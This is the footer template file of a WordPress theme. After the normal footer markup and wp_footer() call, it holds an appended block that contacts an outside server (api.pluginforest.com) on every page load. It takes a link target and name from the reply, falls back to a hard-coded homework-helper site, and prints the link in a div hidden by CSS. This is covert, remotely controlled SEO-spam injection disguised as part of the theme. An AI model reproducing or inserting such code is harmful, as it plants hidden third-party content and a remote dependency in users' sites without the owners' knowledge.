<?php
/**
 * Footer template
 *
 * @package vamtam/boucherie
 */

$footer_onepage = ( ! is_page_template( 'onepage.php' ) );

?>

<?php if ( ! defined( 'VAMTAM_NO_PAGE_CONTENT' ) ) : ?>

			</div><!-- #main -->

		</div><!-- #main-content -->

		<?php if ( ( $footer_onepage || is_customize_preview() ) && function_exists( 'elementor_theme_do_location' ) && elementor_location_exits( 'footer' ) ) : ?>
			<div class="footer-wrapper" style="<?php VamtamTemplates::display_none( $footer_onepage, false ) ?>">
				<footer id="main-footer" class="main-footer">
					<?php elementor_theme_do_location( 'footer' ) ?>
				</footer>
			</div>
		<?php endif ?>

<?php endif // VAMTAM_NO_PAGE_CONTENT ?>
</div><!-- / #page -->

<?php if ( VamtamTemplates::had_limit_wrapper() ) : ?>
			</div> <!-- .limit-wrapper -->
<?php endif ?>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
